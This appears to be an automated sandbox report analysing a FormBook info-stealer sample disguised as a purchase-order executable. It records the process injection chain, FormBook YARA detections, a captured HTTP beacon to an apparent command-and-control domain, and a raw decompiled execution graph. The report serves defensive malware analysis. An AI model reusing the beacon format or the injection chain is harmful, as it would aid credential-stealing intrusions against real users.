                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.649929217.196.55.202803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:31:48.692162991 CET535OUTGET /fo8o/?pnGX8L3p=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.empowermedeco.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Jan 15, 2025 08:31:49.267287970 CET1236INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Wed, 15 Jan 2025 07:31:49 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/?pnGX8L3p=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&xZ4P=rRldwLg0ALTXzVV
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div
                                                                                  Jan 15, 2025 08:31:49.267415047 CET16INData Raw: 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: ></body></html>


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:02:27:59
                                                                                  Start date:15/01/2025
                                                                                  Path:C:\Users\user\Desktop\PO-DOC1522025-12.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\PO-DOC1522025-12.exe"
                                                                                  Imagebase:0x140000
                                                                                  File size:1'645'568 bytes
                                                                                  MD5 hash:DC2314BB7A5383EB616A78E1F43D4472
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:02:28:00
                                                                                  Start date:15/01/2025
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\PO-DOC1522025-12.exe"
                                                                                  Imagebase:0x550000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2299849975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2299849975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2301133615.0000000006990000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2301133615.0000000006990000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:02:28:08
                                                                                  Start date:15/01/2025
                                                                                  Path:C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe"
                                                                                  Imagebase:0xb70000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4621737352.0000000005960000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4621737352.0000000005960000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:4
                                                                                  Start time:02:28:10
                                                                                  Start date:15/01/2025
                                                                                  Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                                  Imagebase:0xfb0000
                                                                                  File size:22'016 bytes
                                                                                  MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4621727339.0000000000870000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4621727339.0000000000870000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4615833693.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4615833693.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:8
                                                                                  Start time:02:28:23
                                                                                  Start date:15/01/2025
                                                                                  Path:C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe"
                                                                                  Imagebase:0xb70000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4623753235.0000000004BC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4623753235.0000000004BC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:10
                                                                                  Start time:02:28:35
                                                                                  Start date:15/01/2025
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff728280000
                                                                                  File size:676'768 bytes
                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:2.7%
                                                                                    Dynamic/Decrypted Code Coverage:2%
                                                                                    Signature Coverage:3.6%
                                                                                    Total number of Nodes:1667
                                                                                    Total number of Limit Nodes:27
                                                                                    execution_graph 96418 143156 96421 143170 96418->96421 96422 143187 96421->96422 96423 14318c 96422->96423 96424 1431eb 96422->96424 96462 1431e9 96422->96462 96425 143265 PostQuitMessage 96423->96425 96426 143199 96423->96426 96428 182dfb 96424->96428 96429 1431f1 96424->96429 96435 14316a 96425->96435 96433 1431a4 96426->96433 96434 182e7c 96426->96434 96427 1431d0 DefWindowProcW 96427->96435 96470 1418e2 10 API calls 96428->96470 96430 14321d SetTimer RegisterWindowMessageW 96429->96430 96431 1431f8 96429->96431 96430->96435 96439 143246 CreatePopupMenu 96430->96439 96436 182d9c 96431->96436 96437 143201 KillTimer 96431->96437 96440 182e68 96433->96440 96441 1431ae 96433->96441 96485 1abf30 34 API calls ___scrt_fastfail 96434->96485 96449 182da1 96436->96449 96450 182dd7 MoveWindow 96436->96450 96466 1430f2 Shell_NotifyIconW ___scrt_fastfail 96437->96466 96438 182e1c 96471 15e499 42 API calls 96438->96471 96439->96435 96484 1ac161 27 API calls ___scrt_fastfail 96440->96484 96446 182e4d 96441->96446 96447 1431b9 96441->96447 96446->96427 96483 1a0ad7 22 API calls 96446->96483 96453 1431c4 96447->96453 96454 143253 96447->96454 96448 182e8e 96448->96427 96448->96435 96455 182dc6 SetFocus 96449->96455 96456 182da7 96449->96456 96450->96435 96451 143214 96467 143c50 DeleteObject DestroyWindow 96451->96467 96452 143263 96452->96435 96453->96427 96472 1430f2 Shell_NotifyIconW ___scrt_fastfail 96453->96472 96468 14326f 44 API calls ___scrt_fastfail 96454->96468 96455->96435 96456->96453 96460 182db0 96456->96460 96469 1418e2 10 API calls 96460->96469 96462->96427 96464 182e41 96473 143837 96464->96473 96466->96451 96467->96435 96468->96452 96469->96435 96470->96438 96471->96453 96472->96464 96474 143862 ___scrt_fastfail 96473->96474 96486 144212 96474->96486 96477 1438e8 96479 143906 Shell_NotifyIconW 96477->96479 96480 183386 Shell_NotifyIconW 96477->96480 96490 143923 96479->96490 96482 14391c 96482->96462 96483->96462 96484->96452 96485->96448 96487 1438b7 96486->96487 96488 1835a4 96486->96488 96487->96477 96512 1ac874 42 API calls _strftime 96487->96512 96488->96487 96489 1835ad DestroyIcon 96488->96489 96489->96487 96491 14393f 96490->96491 96510 143a13 96490->96510 96513 146270 96491->96513 96494 183393 LoadStringW 96497 1833ad 96494->96497 96495 14395a 96518 146b57 96495->96518 96506 143994 ___scrt_fastfail 96497->96506 96539 14a8c7 96497->96539 96498 14396f 96499 1833c9 96498->96499 96500 14397c 96498->96500 96501 146350 22 API calls 96499->96501 96500->96497 96503 143986 96500->96503 96505 1833d7 96501->96505 96530 146350 96503->96530 96505->96506 96543 1433c6 96505->96543 96508 1439f9 Shell_NotifyIconW 96506->96508 96508->96510 96509 1833f9 96511 1433c6 22 API calls 96509->96511 96510->96482 96511->96506 96512->96477 96552 15fe0b 96513->96552 96515 146295 96562 15fddb 96515->96562 96517 14394d 96517->96494 96517->96495 96519 146b67 _wcslen 96518->96519 96520 184ba1 96518->96520 96523 146ba2 96519->96523 96524 146b7d 96519->96524 96588 1493b2 96520->96588 96522 184baa 96522->96522 96526 15fddb 22 API calls 96523->96526 96587 146f34 22 API calls 96524->96587 96528 146bae 96526->96528 96527 146b85 __fread_nolock 96527->96498 96529 15fe0b 22 API calls 96528->96529 96529->96527 96531 146362 96530->96531 96532 184a51 96530->96532 96598 146373 96531->96598 96608 144a88 22 API calls __fread_nolock 96532->96608 96535 14636e 96535->96506 96536 184a5b 96537 14a8c7 22 API calls 96536->96537 96538 184a67 96536->96538 96537->96538 96540 14a8ea __fread_nolock 96539->96540 96541 14a8db 96539->96541 96540->96506 96541->96540 96542 15fe0b 22 API calls 96541->96542 96542->96540 96544 1830bb 96543->96544 96545 1433dd 96543->96545 96547 15fddb 22 API calls 96544->96547 96614 1433ee 96545->96614 96549 1830c5 _wcslen 96547->96549 96548 1433e8 96548->96509 96550 15fe0b 22 API calls 96549->96550 96551 1830fe __fread_nolock 96550->96551 96554 15fddb 96552->96554 96555 15fdfa 96554->96555 96558 15fdfc 96554->96558 96572 16ea0c 96554->96572 96579 164ead 7 API calls 2 library calls 96554->96579 96555->96515 96557 16066d 96581 1632a4 RaiseException 96557->96581 96558->96557 96580 1632a4 RaiseException 96558->96580 96561 16068a 96561->96515 96564 15fde0 96562->96564 96563 16ea0c ___std_exception_copy 21 API calls 96563->96564 96564->96563 96565 15fdfa 96564->96565 96567 15fdfc 96564->96567 96584 164ead 7 API calls 2 library calls 96564->96584 96565->96517 96568 16066d 96567->96568 96585 1632a4 RaiseException 96567->96585 96586 1632a4 RaiseException 96568->96586 96571 16068a 96571->96517 96577 173820 _abort 96572->96577 96573 17385e 96583 16f2d9 20 API calls _abort 96573->96583 96575 173849 RtlAllocateHeap 96576 17385c 96575->96576 96575->96577 96576->96554 96577->96573 96577->96575 96582 164ead 7 API calls 2 library calls 96577->96582 96579->96554 96580->96557 96581->96561 96582->96577 96583->96576 96584->96564 96585->96568 96586->96571 96587->96527 96589 1493c0 96588->96589 96591 1493c9 __fread_nolock 96588->96591 96589->96591 96592 14aec9 96589->96592 96591->96522 96593 14aedc 96592->96593 96597 14aed9 __fread_nolock 96592->96597 96594 15fddb 22 API calls 96593->96594 96595 14aee7 96594->96595 96596 15fe0b 22 API calls 96595->96596 96596->96597 96597->96591 96600 146382 96598->96600 96605 1463b6 __fread_nolock 96598->96605 96599 184a82 96602 15fddb 22 API calls 96599->96602 96600->96599 96601 1463a9 96600->96601 96600->96605 96609 14a587 96601->96609 96604 184a91 96602->96604 96606 15fe0b 22 API calls 96604->96606 96605->96535 96607 184ac5 __fread_nolock 96606->96607 96608->96536 96610 14a59d 96609->96610 96613 14a598 __fread_nolock 96609->96613 96611 18f80f 96610->96611 96612 15fe0b 22 API calls 96610->96612 96612->96613 96613->96605 96615 1433fe _wcslen 96614->96615 96616 18311d 96615->96616 96617 143411 96615->96617 96618 15fddb 22 API calls 96616->96618 96619 14a587 22 API calls 96617->96619 96620 183127 96618->96620 96621 14341e __fread_nolock 96619->96621 96622 15fe0b 22 API calls 96620->96622 96621->96548 96623 183157 __fread_nolock 96622->96623 96624 142e37 96703 14a961 96624->96703 96628 142e6b 96722 143a5a 96628->96722 96630 142e7f 96729 149cb3 96630->96729 96635 182cb0 96773 1b2cf9 96635->96773 96636 142ead 96640 14a8c7 22 API calls 96636->96640 96638 182cc3 96639 182ccf 96638->96639 96799 144f39 96638->96799 96645 144f39 68 API calls 96639->96645 96642 142ec3 96640->96642 96757 146f88 22 API calls 96642->96757 96644 142ecf 96646 149cb3 22 API calls 96644->96646 96647 182ce5 96645->96647 96648 142edc 96646->96648 96805 143084 22 API calls 96647->96805 96758 14a81b 41 API calls 96648->96758 96651 142eec 96653 149cb3 22 API calls 96651->96653 96652 182d02 96806 143084 22 API calls 96652->96806 96655 142f12 96653->96655 96759 14a81b 41 API calls 96655->96759 96656 182d1e 96658 143a5a 24 API calls 96656->96658 96659 182d44 96658->96659 96807 143084 22 API calls 96659->96807 96660 142f21 96662 14a961 22 API calls 96660->96662 96664 142f3f 96662->96664 96663 182d50 96665 14a8c7 22 API calls 96663->96665 96760 143084 22 API calls 96664->96760 96667 182d5e 96665->96667 96808 143084 22 API calls 96667->96808 96668 142f4b 96761 164a28 40 API calls 3 library calls 96668->96761 96671 182d6d 96674 14a8c7 22 API calls 96671->96674 96672 142f59 96672->96647 96673 142f63 96672->96673 96762 164a28 40 API calls 3 library calls 96673->96762 96676 182d83 96674->96676 96809 143084 22 API calls 96676->96809 96677 142f6e 96677->96652 96679 142f78 96677->96679 96763 164a28 40 API calls 3 library calls 96679->96763 96680 182d90 96682 142f83 96682->96656 96683 142f8d 96682->96683 96764 164a28 40 API calls 3 library calls 96683->96764 96685 142f98 96686 142fdc 96685->96686 96765 143084 22 API calls 96685->96765 96686->96671 96687 142fe8 96686->96687 96687->96680 96767 1463eb 22 API calls 96687->96767 96689 142fbf 96691 14a8c7 22 API calls 96689->96691 96693 142fcd 96691->96693 96692 142ff8 96768 146a50 22 API calls 96692->96768 96766 143084 22 API calls 96693->96766 96696 143006 96769 1470b0 23 API calls 96696->96769 96700 143021 96701 143065 96700->96701 96770 146f88 22 API calls 96700->96770 96771 1470b0 23 API calls 96700->96771 96772 143084 22 API calls 96700->96772 96704 15fe0b 22 API calls 96703->96704 96705 14a976 96704->96705 96706 15fddb 22 API calls 96705->96706 96707 142e4d 96706->96707 96708 144ae3 96707->96708 96709 144af0 __wsopen_s 96708->96709 96710 146b57 22 API calls 96709->96710 96711 144b22 96709->96711 96710->96711 96721 144b58 96711->96721 96810 144c6d 96711->96810 96713 144c6d 22 API calls 96713->96721 96714 149cb3 22 API calls 96716 144c52 96714->96716 96715 149cb3 22 API calls 96715->96721 96717 14515f 22 API calls 96716->96717 96719 144c5e 96717->96719 96719->96628 96720 144c29 96720->96714 96720->96719 96721->96713 96721->96715 96721->96720 96813 14515f 96721->96813 96819 181f50 96722->96819 96725 149cb3 22 API calls 96726 143a8d 96725->96726 96821 143aa2 96726->96821 96728 143a97 96728->96630 96730 149cc2 _wcslen 96729->96730 96731 15fe0b 22 API calls 96730->96731 96732 149cea __fread_nolock 96731->96732 96733 15fddb 22 API calls 96732->96733 96734 142e8c 96733->96734 96735 144ecb 96734->96735 96841 144e90 LoadLibraryA 96735->96841 96740 144ef6 LoadLibraryExW 96849 144e59 LoadLibraryA 96740->96849 96741 183ccf 96742 144f39 68 API calls 96741->96742 96744 183cd6 96742->96744 96746 144e59 3 API calls 96744->96746 96748 183cde 96746->96748 96871 1450f5 96748->96871 96749 144f20 96749->96748 96750 144f2c 96749->96750 96752 144f39 68 API calls 96750->96752 96753 142ea5 96752->96753 96753->96635 96753->96636 96756 183d05 96757->96644 96758->96651 96759->96660 96760->96668 96761->96672 96762->96677 96763->96682 96764->96685 96765->96689 96766->96686 96767->96692 96768->96696 96769->96700 96770->96700 96771->96700 96772->96700 96774 1b2d15 96773->96774 96775 14511f 64 API calls 96774->96775 96776 1b2d29 96775->96776 97021 1b2e66 96776->97021 96779 1b2d3f 96779->96638 96780 1450f5 40 API calls 96781 1b2d56 96780->96781 96782 1450f5 40 API calls 96781->96782 96783 1b2d66 96782->96783 96784 1450f5 40 API calls 96783->96784 96785 1b2d81 96784->96785 96786 1450f5 40 API calls 96785->96786 96787 1b2d9c 96786->96787 96788 14511f 64 API calls 96787->96788 96789 1b2db3 96788->96789 96790 16ea0c ___std_exception_copy 21 API calls 96789->96790 96791 1b2dba 96790->96791 96792 16ea0c ___std_exception_copy 21 API calls 96791->96792 96793 1b2dc4 96792->96793 96794 1450f5 40 API calls 96793->96794 96795 1b2dd8 96794->96795 96796 1b28fe 27 API calls 96795->96796 96797 1b2dee 96796->96797 96797->96779 97027 1b22ce 96797->97027 96800 144f43 96799->96800 96801 144f4a 96799->96801 96802 16e678 67 API calls 96800->96802 96803 144f59 96801->96803 96804 144f6a FreeLibrary 96801->96804 96802->96801 96803->96639 96804->96803 96805->96652 96806->96656 96807->96663 96808->96671 96809->96680 96811 14aec9 22 API calls 96810->96811 96812 144c78 96811->96812 96812->96711 96814 14516e 96813->96814 96818 14518f __fread_nolock 96813->96818 96817 15fe0b 22 API calls 96814->96817 96815 15fddb 22 API calls 96816 1451a2 96815->96816 96816->96721 96817->96818 96818->96815 96820 143a67 GetModuleFileNameW 96819->96820 96820->96725 96822 181f50 __wsopen_s 96821->96822 96823 143aaf GetFullPathNameW 96822->96823 96824 143ace 96823->96824 96825 143ae9 96823->96825 96826 146b57 22 API calls 96824->96826 96835 14a6c3 96825->96835 96828 143ada 96826->96828 96831 1437a0 96828->96831 96832 1437ae 96831->96832 96833 1493b2 22 API calls 96832->96833 96834 1437c2 96833->96834 96834->96728 96836 14a6dd 96835->96836 96840 14a6d0 96835->96840 96837 15fddb 22 API calls 96836->96837 96838 14a6e7 96837->96838 96839 15fe0b 22 API calls 96838->96839 96839->96840 96840->96828 96842 144ec6 96841->96842 96843 144ea8 GetProcAddress 96841->96843 96846 16e5eb 96842->96846 96844 144eb8 96843->96844 96844->96842 96845 144ebf FreeLibrary 96844->96845 96845->96842 96879 16e52a 96846->96879 96848 144eea 96848->96740 96848->96741 96850 144e8d 96849->96850 96851 144e6e GetProcAddress 96849->96851 96854 144f80 96850->96854 96852 144e7e 96851->96852 96852->96850 96853 144e86 FreeLibrary 96852->96853 96853->96850 96855 15fe0b 22 API calls 96854->96855 96856 144f95 96855->96856 96947 145722 96856->96947 96858 144fa1 __fread_nolock 96859 1450a5 96858->96859 96860 183d1d 96858->96860 96870 144fdc 96858->96870 96950 1442a2 CreateStreamOnHGlobal 96859->96950 96961 1b304d 74 API calls 96860->96961 96863 183d22 96865 14511f 64 API calls 96863->96865 96864 1450f5 40 API calls 96864->96870 96866 183d45 96865->96866 96867 1450f5 40 API calls 96866->96867 96868 14506e ISource 96867->96868 96868->96749 96870->96863 96870->96864 96870->96868 96956 14511f 96870->96956 96872 145107 96871->96872 96873 183d70 96871->96873 96983 16e8c4 96872->96983 96876 1b28fe 97004 1b274e 96876->97004 96878 1b2919 96878->96756 96881 16e536 CallCatchBlock 96879->96881 96880 16e544 96904 16f2d9 20 API calls _abort 96880->96904 96881->96880 96883 16e574 96881->96883 96885 16e586 96883->96885 96886 16e579 96883->96886 96884 16e549 96905 1727ec 26 API calls _abort 96884->96905 96896 178061 96885->96896 96906 16f2d9 20 API calls _abort 96886->96906 96890 16e58f 96891 16e595 96890->96891 96894 16e5a2 96890->96894 96907 16f2d9 20 API calls _abort 96891->96907 96892 16e554 __wsopen_s 96892->96848 96908 16e5d4 LeaveCriticalSection __fread_nolock 96894->96908 96897 17806d CallCatchBlock 96896->96897 96909 172f5e EnterCriticalSection 96897->96909 96899 17807b 96910 1780fb 96899->96910 96903 1780ac __wsopen_s 96903->96890 96904->96884 96905->96892 96906->96892 96907->96892 96908->96892 96909->96899 96911 17811e 96910->96911 96912 178177 96911->96912 96918 178088 96911->96918 96926 16918d EnterCriticalSection 96911->96926 96927 1691a1 LeaveCriticalSection 96911->96927 96928 174c7d 96912->96928 96917 178189 96917->96918 96941 173405 11 API calls 2 library calls 96917->96941 96923 1780b7 96918->96923 96920 1781a8 96942 16918d EnterCriticalSection 96920->96942 96946 172fa6 LeaveCriticalSection 96923->96946 96925 1780be 96925->96903 96926->96911 96927->96911 96933 174c8a _abort 96928->96933 96929 174cca 96944 16f2d9 20 API calls _abort 96929->96944 96930 174cb5 RtlAllocateHeap 96931 174cc8 96930->96931 96930->96933 96935 1729c8 96931->96935 96933->96929 96933->96930 96943 164ead 7 API calls 2 library calls 96933->96943 96936 1729d3 RtlFreeHeap 96935->96936 96937 1729fc _free 96935->96937 96936->96937 96938 1729e8 96936->96938 96937->96917 96945 16f2d9 20 API calls _abort 96938->96945 96940 1729ee GetLastError 96940->96937 96941->96920 96942->96918 96943->96933 96944->96931 96945->96940 96946->96925 96948 15fddb 22 API calls 96947->96948 96949 145734 96948->96949 96949->96858 96951 1442bc FindResourceExW 96950->96951 96955 1442d9 96950->96955 96952 1835ba LoadResource 96951->96952 96951->96955 96953 1835cf SizeofResource 96952->96953 96952->96955 96954 1835e3 LockResource 96953->96954 96953->96955 96954->96955 96955->96870 96957 14512e 96956->96957 96960 183d90 96956->96960 96962 16ece3 96957->96962 96961->96863 96965 16eaaa 96962->96965 96964 14513c 96964->96870 96966 16eab6 CallCatchBlock 96965->96966 96967 